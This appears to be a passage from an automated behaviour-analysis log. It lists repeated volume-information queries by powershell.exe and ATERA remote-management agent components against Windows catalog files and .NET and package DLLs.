                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe VolumeInformation
